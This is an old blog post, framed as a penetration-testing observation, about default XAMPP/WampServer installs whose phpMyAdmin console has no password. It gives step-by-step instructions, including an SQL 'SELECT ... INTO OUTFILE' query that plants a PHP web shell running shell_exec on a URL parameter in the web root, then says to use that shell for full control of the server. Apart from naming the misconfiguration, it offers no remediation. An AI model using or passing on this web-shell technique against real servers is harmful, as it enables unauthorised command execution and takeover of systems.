Saturday, November 14, 2009

XAMPP/WampServer PHPMySQLAdmin console vulnerability

Hello Friends, today I'm going to discuss an interesting topic on XAMPP/WampServer. The above two applications are easily available on internet and easy-to-use too. You can visit the following web sites for more information.

During internal penetration testing, we noticed most of system administrators (small or medium organization) do not configure the web server (XAMPP/WampServer) properly, they simply deploy the web server with default configuration, without giving php/mysql admin password.

Usually, with default configuration, any user can access the Admin console of that web server and using this admin-console an user can perform create / update / delete operations on mysql database server. From web admin console ( phpinfo() ), we can get server installation path.

I'll tell how phpMysqlAdmin console can destroy a system, the steps are given below,
step 1. Get the web server installation path ( phpinf.php or test.php or phpinfo() ), say 'c:\XAMPP\htdocs'.

step 2. Go to php-mysql admin section.
step 3. Go to Query/sql tab.

step 4.
Write the following sql query into input text area and submit the query,
SELECT "< ? $c = $_GET['cmd']; $op = shell_exec($c); echo $op ? >" into OUTFILE "c:\XAMPP\htdocs\shell.php";

N.B: The above SQL command will create a shell.php file on the web server.
step 5.
After executing the above command , the shell.php file will be accessible
directly, as it was created on web directory.

step 6.
Access the shell.php file from your web browser,

In your_command field you can use any system command you want to execute.By doing this
you will get full control on the web server and its called Owned-THE-BOX.

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